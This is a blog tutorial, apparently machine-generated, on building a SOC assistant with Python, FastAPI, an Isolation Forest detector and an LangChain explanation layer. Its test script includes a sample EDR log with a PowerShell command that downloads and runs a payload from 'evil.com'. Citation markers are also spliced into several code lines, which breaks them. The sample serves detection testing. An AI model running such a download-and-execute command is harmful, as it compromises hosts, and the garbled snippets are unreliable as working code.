Back to Tutorials
tutorialstutorialai

How to Build a SOC Assistant with AI Threat Detection

Practical tutorial: Detect threats with AI: building a SOC assistant

BlogIA AcademyJune 20, 202616 min read3 066 words

How to Build a SOC Assistant with AI Threat Detection

Table of Contents

📺 Watch: Neural Networks Explained

Video by 3Blue1Brown


Security Operations Centers (SOCs) face an impossible challenge: analysts must triage thousands of alerts daily while sophisticated attackers increasingly use AI to evade detection. Building an AI-powered SOC assistant isn't just about adding another tool—it's about fundamentally changing how we process security telemetry at scale.

In this tutorial, we'll build a production-ready SOC assistant that ingests security logs, detects anomalies using machine learning, and provides natural language explanations of threats. We'll use Python, FastAPI, scikit-learn, and LangChain [8] to create a system that can handle real-world security data.

Understanding the SOC Assistant Architecture

Before writing code, let's understand what makes a SOC assistant production-worthy. Traditional SIEM systems rely on static rules—they're brittle and miss novel attacks. Our assistant will use three layers:

  1. Ingestion Layer: Parse and normalize security logs from multiple sources (firewalls, EDR, cloud logs)
  2. Detection Layer: Apply both supervised and unsupervised ML models to identify threats
  3. Explanation Layer: Use a language model to generate human-readable threat summaries

The key insight: we're not replacing human analysts—we're augmenting them. The assistant handles the 99% of alerts that are false positives, surfacing only the most critical incidents with context.

Prerequisites and Environment Setup

You'll need Python 3.10+ and a machine with at least 8GB RAM. We'll use these libraries:

# Create a virtual environment
python -m venv soc_assistant
source soc_assistant/bin/activate  # On Windows: soc_assistant\Scripts\activate

# Install core dependencies
pip install fastapi==0.111.0 uvicorn==0.30.1 pandas==2.2.2 numpy==1.26.4
pip install scikit-learn==1.5.0 joblib==1.4.2 pydantic==2.7.4
pip install langchain==0.2.5 langchain-openai [7]==0.1.9
pip install python-multipart==0.0.9 httpx==0.27.0

For the language model component, you'll need an OpenAI API key (or you can substitute with any LangChain-compatible model). Set it as an environment variable:

export OPENAI_API_KEY="your-key-here"

Building the Log Ingestion Pipeline

The first challenge in any SOC tool is handling diverse log formats. A firewall log looks nothing like a Windows Event log. We'll build a flexible parser that normalizes everything into a common schema.

# ingestion.py
import json
import hashlib
from datetime import datetime
from typing import Dict, List, Optional, Any
from pydantic import BaseModel, Field, validator
import pandas as pd

class SecurityEvent(BaseModel):
    """Normalized security event schema"""
    timestamp: datetime
    source_ip: Optional[str] = None
    destination_ip: Optional[str] = None
    source_port: Optional[int] = None
    destination_port: Optional[int] = None
    protocol: Optional[str] = None
    action: str = "allow"  # allow, deny, alert
    severity: int = Field(default=3, ge=0, le=5)
    log_source: str  # firewall, edr, cloudtrail, etc.
    raw_message: str
    event_hash: str = ""

    @validator('event_hash', pre=True, always=True)
    def generate_hash(cls, v, values):
        if not v:
            raw = values.get('raw_message', '')
            return hashlib.sha256(raw.encode()).hexdigest()[:16]
        return v

class LogParser:
    """Handles multiple log formats and normalizes them"""

    PARSERS = {
        'firewall': lambda msg: {
            'source_ip': msg.get('src_ip'),
            'destination_ip': msg.get('dst_ip'),
            'source_port': msg.get('src_port'),
            'destination_port': msg.get('dst_port'),
            'protocol': msg.get('protocol', 'tcp'),
            'action': msg.get('action', 'allow'),
            'severity': 2 if msg.get('action') == 'deny' else 1
        },
        'edr': lambda msg: {
            'source_ip': msg.get('device_ip'),
            'destination_ip': msg.get('remote_ip'),
            'action': 'alert' if msg.get('threat_score', 0) > 50 else 'allow',
            'severity': min(5, msg.get('threat_score', 0) // 20)
        },
        'cloudtrail': lambda msg: {
            'source_ip': msg.get('sourceIPAddress'),
            'action': 'deny' if msg.get('errorCode') else 'allow',
            'severity': 4 if msg.get('errorCode') else 1
        }
    }

    def parse(self, raw_log: str, log_source: str) -> SecurityEvent:
        """Parse a raw log string into a normalized SecurityEvent"""
        try:
            parsed = json.loads(raw_log)
        except json.JSONDecodeError:
            # Handle non-JSON logs (e.g., syslog format)
            parsed = self._parse_syslog(raw_log)

        parser = self.PARSERS.get(log_source, self._default_parser)
        event_data = parser(parsed)

        return SecurityEvent(
            timestamp=datetime.utcnow(),
            log_source=log_source,
            raw_message=raw_log,
            **event_data
        )

    def _parse_syslog(self, raw: str) -> Dict:
        """Basic syslog parser - extend for your environment"""
        parts = raw.split(' ', 5)
        return {'message': parts[-1] if len(parts) > 1 else raw}

    def _default_parser(self, msg: Dict) -> Dict:
        """Fallback parser for unknown log sources"""
        return {
            'source_ip': msg.get('ip') or msg.get('address'),
            'action': msg.get('status', 'unknown'),
            'severity': 3
        }

This parser handles the three most common log sources in enterprise environments. The key design decision: we use a strategy pattern with PARSERS dictionary, making it trivial to add new log sources. Each parser returns only the fields it can extract, and the SecurityEvent model fills defaults for missing values.

Edge case: What if a log source sends malformed JSON? Our try/except catches this and falls back to syslog parsing. In production, you'd want to add retry logic and dead-letter queues for unparseable logs.

Implementing the Anomaly Detection Engine

Now for the core ML component. We'll train an isolation forest model—it's excellent for security data because it doesn't assume normal data is Gaussian, and it handles high-dimensional sparse data well.

# detection.py
import numpy as np
import pandas as pd
from sklearn.ensemble import IsolationForest
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
import joblib
from typing import List, Tuple, Optional
import logging

logger = logging.getLogger(__name__)

class ThreatDetector:
    """
    Production anomaly detection for security events.
    Uses Isolation Forest with careful feature engineering.
    """

    def __init__(self, contamination: float = 0.01):
        """
        Args:
            contamination: Expected proportion of anomalies (default 1%)
                          In SOC data, real threats are rare
        """
        self.contamination = contamination
        self.pipeline = None
        self.feature_names = None

    def _build_features(self, events: List[SecurityEvent]) -> pd.DataFrame:
        """Transform security events into ML-ready features"""
        df = pd.DataFrame([e.dict() for e in events])

        # Temporal features
        df['hour'] = pd.to_datetime(df['timestamp']).dt.hour
        df['day_of_week'] = pd.to_datetime(df['timestamp']).dt.dayofweek
        df['is_business_hours'] = ((df['hour'] >= 8) & (df['hour'] <= 18)).astype(int)

        # Port features (common attack vectors)
        df['is_well_known_port'] = df['destination_port'].apply(
            lambda x: 1 if x and x < 1024 else 0
        )
        df['is_ephemeral_port'] = df['destination_port'].apply(
            lambda x: 1 if x and x > 49151 else 0
        )

        # Protocol encoding
        protocol_map = {'tcp': 0, 'udp': 1, 'icmp': 2, 'unknown': -1}
        df['protocol_encoded'] = df['protocol'].map(protocol_map).fillna(-1)

        # Action encoding
        action_map = {'allow': 0, 'deny': 1, 'alert': 2, 'unknown': -1}
        df['action_encoded'] = df['action'].map(action_map).fillna(-1)

        # Select features for model
        feature_cols = [
            'severity', 'hour', 'day_of_week', 'is_business_hours',
            'is_well_known_port', 'is_ephemeral_port',
            'protocol_encoded', 'action_encoded'
        ]

        self.feature_names = feature_cols
        return df[feature_cols]

    def train(self, events: List[SecurityEvent]) -> None:
        """Train the anomaly detection model on historical data"""
        logger.info(f"Training on {len(events)} events")

        X = self._build_features(events)

        # Scale features - important for Isolation Forest
        scaler = StandardScaler()
        X_scaled = scaler.fit_transform(X)

        # Train model
        # Note: n_estimators=200 for production, 100 for dev
        self.model = IsolationForest(
            n_estimators=200,
            contamination=self.contamination,
            random_state=42,
            n_jobs=-1  # Use all CPU cores
        )
        self.model.fit(X_scaled)

        # Save artifacts
        self.scaler = scaler
        logger.info("Model training complete")

    def predict(self, events: List[SecurityEvent]) -> List[Tuple[bool, float]]:
        """
        Predict if events are anomalous.
        Returns list of (is_threat, confidence_score) tuples.
        """
        if not self.model:
            raise RuntimeError("Model not trained. Call train() first.")

        X = self._build_features(events)
        X_scaled = self.scaler.transform(X)

        # IsolationForest returns -1 for anomalies, 1 for normal
        predictions = self.model.predict(X_scaled)
        scores = self.model.score_samples(X_scaled)

        # Convert to probability-like scores (0-1, higher = more anomalous)
        # score_samples returns negative values for anomalies
        normalized_scores = 1 / (1 + np.exp(-scores))  # Sigmoid normalization

        results = []
        for pred, score in zip(predictions, normalized_scores):
            is_threat = pred == -1
            results.append((is_threat, float(score)))

        return results

    def save(self, path: str) -> None:
        """Persist model to disk"""
        artifacts = {
            'model': self.model,
            'scaler': self.scaler,
            'feature_names': self.feature_names,
            'contamination': self.contamination
        }
        joblib.dump(artifacts, path)
        logger.info(f"Model saved to {path}")

    @classmethod
    def load(cls, path: str) -> 'ThreatDetector':
        """Load a trained model from disk"""
        artifacts = joblib.load(path)
        detector = cls(contamination=artifacts['contamination'])
        detector.model = artifacts['model']
        detector.scaler = artifacts['scaler']
        detector.feature_names = artifacts['feature_names']
        return detector

The ThreatDetector class is designed for production use. Key decisions:

  • Feature engineering matters more than model choice: We extract temporal patterns (business hours), port characteristics, and protocol information. These features capture common attack patterns without requiring deep packet inspection.
  • Contamination parameter: In real SOC data, true threats are rare (often <0.1%). We set contamination to 1% as a starting point—you'll tune this based on your environment.
  • Score normalization: Isolation Forest returns raw scores that are hard to interpret. We apply a sigmoid transformation to get 0-1 scores that analysts can threshold.

Edge case: What if you have no historical data for training? You can start with a pre-trained model on public datasets like the CICIDS2017 dataset. Alternatively, use unsupervised methods that don't require training, like statistical thresholding on connection rates.

Building the LLM-Powered Explanation Layer

Raw anomaly scores aren't helpful to SOC analysts. They need context: "Why is this flagged? What should I do?" We'll use LangChain to generate structured threat summaries.

# explainer.py
from langchain_openai import ChatOpenAI
from langchain.prompts import ChatPromptTemplate
from langchain.output_parsers import PydanticOutputParser
from pydantic import BaseModel, Field
from typing import Optional
import logging

logger = logging.getLogger(__name__)

class ThreatExplanation(BaseModel):
    """Structured explanation of a detected threat"""
    threat_type: str = Field(description="Type of threat (e.g., 'Port Scan', 'Brute Force')")
    confidence: str = Field(description="Low/Medium/High")
    key_indicators: list[str] = Field(description="Specific suspicious indicators")
    recommended_action: str = Field(description="What the analyst should do")
    severity_override: Optional[int] = Field(None, description="Suggested severity adjustment")

class ThreatExplainer:
    """
    Uses LLM to generate human-readable threat explanations.
    Designed to be stateless and fast for real-time use.
    """

    def __init__(self, model_name: str = "gpt [5]-4o-mini"):
        """
        Args:
            model_name: OpenAI model. gpt-4o-mini is fast and cheap for this task.
                       For sensitive environments, use a local model via Ollama.
        """
        self.llm = ChatOpenAI(
            model=model_name,
            temperature=0.1,  # Low temperature for consistent output
            max_tokens=300
        )

        self.parser = PydanticOutputParser(pydantic_object=ThreatExplanation)

        self.prompt = ChatPromptTemplate.from_messages([
            ("system", """You are a senior SOC analyst explaining threats to junior analysts.
            Analyze the security event and provide a structured explanation.
            Be specific and actionable. Do not speculate beyond the data provided.

            {format_instructions}"""),
            ("human", """Analyze this security event flagged as anomalous:

            Event Details:
            - Source IP: {source_ip}
            - Destination IP: {destination_ip}
            - Destination Port: {destination_port}
            - Protocol: {protocol}
            - Action: {action}
            - Severity: {severity}
            - Anomaly Score: {anomaly_score:.2f}
            - Time: {timestamp}

            Provide a structured threat explanation.""")
        ])

    def explain(self, event: SecurityEvent, anomaly_score: float) -> ThreatExplanation:
        """Generate explanation for a flagged event"""
        try:
            messages = self.prompt.format_messages(
                format_instructions=self.parser.get_format_instructions(),
                source_ip=event.source_ip or "Unknown",
                destination_ip=event.destination_ip or "Unknown",
                destination_port=event.destination_port or "N/A",
                protocol=event.protocol or "Unknown",
                action=event.action,
                severity=event.severity,
                anomaly_score=anomaly_score,
                timestamp=event.timestamp.isoformat()
            )

            response = self.llm.invoke(messages)
            explanation = self.parser.parse(response.content)

            logger.info(f"Generated explanation: {explanation.threat_type}")
            return explanation

        except Exception as e:
            logger.error(f"LLM explanation failed: {e}")
            # Fallback: return a basic explanation
            return ThreatExplanation(
                threat_type="Anomalous Event",
                confidence="Medium",
                key_indicators=[f"Anomaly score: {anomaly_score:.2f}"],
                recommended_action="Review event context in SIEM",
                severity_override=None
            )

The ThreatExplainer uses a structured output parser to ensure the LLM returns consistent, parseable responses. This is critical for production—you can't have the LLM occasionally returning free-form text that breaks your downstream automation.

Important: The temperature is set to 0.1, not 0. Why? At temperature 0, the model becomes deterministic but can get stuck in repetitive patterns. A tiny amount of randomness ensures variety in explanations while maintaining consistency.

Putting It All Together: The FastAPI Application

Now we wire everything into a production API. This handles real-time log ingestion, detection, and explanation.

# app.py
from fastapi import FastAPI, HTTPException, BackgroundTasks
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel
from typing import List, Optional
import asyncio
from datetime import datetime
import logging

from ingestion import LogParser, SecurityEvent
from detection import ThreatDetector
from explainer import ThreatExplainer, ThreatExplanation

# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

app = FastAPI(
    title="SOC Assistant API",
    description="AI-powered threat detection and explanation for SOC analysts",
    version="1.0.0"
)

# Allow CORS for internal tools
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],  # Restrict in production
    allow_methods=["*"],
    allow_headers=["*"],
)

# Initialize components
parser = LogParser()
detector = ThreatDetector(contamination=0.01)
explainer = ThreatExplainer()

# In-memory event store (use Redis/PostgreSQL in production)
event_store: List[SecurityEvent] = []
MAX_EVENTS = 10000

class LogInput(BaseModel):
    raw_log: str
    log_source: str

class DetectionResult(BaseModel):
    event: SecurityEvent
    is_threat: bool
    anomaly_score: float
    explanation: Optional[ThreatExplanation] = None

@app.on_event("startup")
async def startup():
    """Load or initialize model on startup"""
    try:
        detector.load("threat_model.joblib")
        logger.info("Loaded existing model")
    except FileNotFoundError:
        logger.warning("No pre-trained model found. Train with sample data first.")
        # In production, you'd load from a model registry

@app.post("/ingest", response_model=DetectionResult)
async def ingest_log(log_input: LogInput, background_tasks: BackgroundTasks):
    """
    Ingest a security log, detect threats, and generate explanation.

    This is the main endpoint for real-time log processing.
    """
    # Parse the log
    try:
        event = parser.parse(log_input.raw_log, log_input.log_source)
    except Exception as e:
        raise HTTPException(status_code=400, detail=f"Log parsing failed: {e}")

    # Store event (async to not block response)
    background_tasks.add_task(store_event, event)

    # Detect threats
    try:
        results = detector.predict([event])
        is_threat, anomaly_score = results[0]
    except RuntimeError:
        # Model not trained - use rule-based fallback
        is_threat = event.severity >= 4
        anomaly_score = event.severity / 5.0

    # Generate explanation for threats
    explanation = None
    if is_threat:
        explanation = explainer.explain(event, anomaly_score)

    return DetectionResult(
        event=event,
        is_threat=is_threat,
        anomaly_score=anomaly_score,
        explanation=explanation
    )

def store_event(event: SecurityEvent):
    """Thread-safe event storag [1]e with size limit"""
    global event_store
    event_store.append(event)
    if len(event_store) > MAX_EVENTS:
        event_store = event_store[-MAX_EVENTS:]

@app.post("/train")
async def train_model(background_tasks: BackgroundTasks):
    """
    Train the anomaly detection model on stored events.
    This is typically called periodically (e.g., daily cron job).
    """
    if len(event_store) < 100:
        raise HTTPException(
            status_code=400,
            detail=f"Need at least 100 events for training, got {len(event_store)}"
        )

    background_tasks.add_task(_train_and_save, list(event_store))
    return {"status": "training_started", "events_count": len(event_store)}

async def _train_and_save(events: List[SecurityEvent]):
    """Background training task"""
    try:
        detector.train(events)
        detector.save("threat_model.joblib")
        logger.info("Model training and save complete")
    except Exception as e:
        logger.error(f"Training failed: {e}")

@app.get("/events", response_model=List[SecurityEvent])
async def get_events(limit: int = 100, offset: int = 0):
    """Retrieve stored events for analysis"""
    return event_store[offset:offset + limit]

@app.get("/health")
async def health_check():
    """Simple health check endpoint"""
    return {
        "status": "healthy",
        "events_stored": len(event_store),
        "model_loaded": detector.model is not None
    }

if __name__ == "__main__":
    import uvicorn
    uvicorn.run(
        "app:app",
        host="0.0.0.0",
        port=8000,
        reload=True,  # Disable in production
        log_level="info"
    )

Running the SOC Assistant

Let's test the system with sample data. Create a test script:

# test_assistant.py
import requests
import json
import time

BASE_URL = "http://localhost:8000"

# Sample logs simulating different scenarios
test_logs = [
    # Normal SSH connection
    {
        "raw_log": json.dumps({
            "src_ip": "10.0.1.50",
            "dst_ip": "10.0.1.1",
            "dst_port": 22,
            "protocol": "tcp",
            "action": "allow"
        }),
        "log_source": "firewall"
    },
    # Suspicious port scan attempt
    {
        "raw_log": json.dumps({
            "src_ip": "185.220.101.1",
            "dst_ip": "10.0.1.1",
            "dst_port": 445,
            "protocol": "tcp",
            "action": "deny"
        }),
        "log_source": "firewall"
    },
    # EDR alert with high threat score
    {
        "raw_log": json.dumps({
            "device_ip": "10.0.1.100",
            "remote_ip": "45.33.32.156",
            "threat_score": 85,
            "process": "powershell.exe",
            "command": "Invoke-Expression -Command (New-Object Net.WebClient).DownloadString('http://evil.com/payload')"
        }),
        "log_source": "edr"
    }
]

def test_pipeline():
    # First, ingest some training data
    print("Ingesting training data..")
    for _ in range(150):  # Generate enough events for training
        for log in test_logs:
            resp = requests.post(f"{BASE_URL}/ingest", json=log)
            if resp.status_code != 200:
                print(f"Error: {resp.text}")

    # Train the model
    print("Training model..")
    resp = requests.post(f"{BASE_URL}/train")
    print(f"Training response: {resp.json()}")

    # Wait for training
    time.sleep(5)

    # Test detection on a new event
    print("\nTesting detection..")
    test_event = {
        "raw_log": json.dumps({
            "src_ip": "10.0.1.50",
            "dst_ip": "10.0.1.1",
            "dst_port": 3389,  # RDP - common attack target
            "protocol": "tcp",
            "action": "allow"
        }),
        "log_source": "firewall"
    }

    resp = requests.post(f"{BASE_URL}/ingest", json=test_event)
    result = resp.json()

    print(f"Is threat: {result['is_threat']}")
    print(f"Anomaly score: {result['anomaly_score']:.3f}")
    if result['explanation']:
        exp = result['explanation']
        print(f"Threat type: {exp['threat_type']}")
        print(f"Confidence: {exp['confidence']}")
        print(f"Indicators: {', '.join(exp['key_indicators'])}")
        print(f"Action: {exp['recommended_action']}")

if __name__ == "__main__":
    test_pipeline()

Production Considerations and Edge Cases

Building a SOC assistant for production requires addressing several critical issues:

1. Data Drift and Model Retraining Security patterns change constantly. A model trained on last month's data may miss new attack techniques. Implement automated retraining pipelines that trigger when model performance drops below thresholds. Monitor the distribution of anomaly scores over time—a sudden shift often indicates data drift.

2. Latency Requirements SOCs need real-time detection. Our API handles individual events in milliseconds, but batch processing for historical analysis can be slower. Consider using async workers (Celery with Redis) for training tasks and keeping the inference path synchronous.

3. False Positive Management No model is perfect. Implement a feedback loop where analysts can mark detections as false positives. Use this feedback to:

  • Adjust the contamination parameter
  • Fine-tune feature weights
  • Create exclusion rules for known benign patterns

4. Memory Management Our in-memory event store is fine for development but won't scale. In production:

  • Use TimescaleDB or Elasticsearch for event storage
  • Implement TTL-based data retention (e.g., 90 days for raw logs)
  • Use Redis for caching frequent queries

5. API Rate Limiting and Authentication The /ingest endpoint could be abused. Implement:

  • API key authentication
  • Rate limiting per source (e.g., 1000 events/second per log source)
  • Input validation and sanitization

6. LLM Cost Management Each LLM call costs money and adds latency. Strategies to reduce costs:

  • Cache explanations for similar events (hash on event features)
  • Use smaller models (gpt-4o-mini instead of gpt-4)
  • Only generate explanations for events above a confidence threshold
  • Batch explanations and process asynchronously

What's Next

You've built a functional SOC assistant, but this is just the beginning. Here are natural next steps:

  1. Add real-time dashboards: Use Streamlit or Grafana to visualize detection rates, top threat types, and analyst response times
  2. Integrate with ticketing systems: Automatically create Jira or ServiceNow tickets for confirmed threats
  3. Implement alert correlation: Group related events into incidents using temporal and spatial clustering
  4. Add explainable AI: Use SHAP values to show which features contributed most to each detection
  5. Deploy with Kubernetes: Containerize the application and deploy with auto-scaling for production loads

The SOC assistant we built handles the core workflow: ingest, detect, explain. In production, you'd add monitoring, alerting, and integration with existing security tools. The architecture is designed to be extended—add new log parsers, swap ML models, or connect to different LLM providers without changing the core pipeline.

Remember: AI in security is a force multiplier, not a replacement. The best SOCs use tools like this to handle the noise so human analysts can focus on the signal—the sophisticated attacks that require human judgment and creativity.


References

1. Wikipedia - Rag. Wikipedia. [Source]
2. Wikipedia - GPT. Wikipedia. [Source]
3. Wikipedia - LangChain. Wikipedia. [Source]
4. GitHub - Shubhamsaboo/awesome-llm-apps. Github. [Source]
5. GitHub - Significant-Gravitas/AutoGPT. Github. [Source]
6. GitHub - langchain-ai/langchain. Github. [Source]
7. GitHub - openai/openai-python. Github. [Source]
8. LangChain Pricing. Pricing. [Source]
tutorialai
Share this article:

Was this article helpful?

Let us know to improve our AI generation.

Related Articles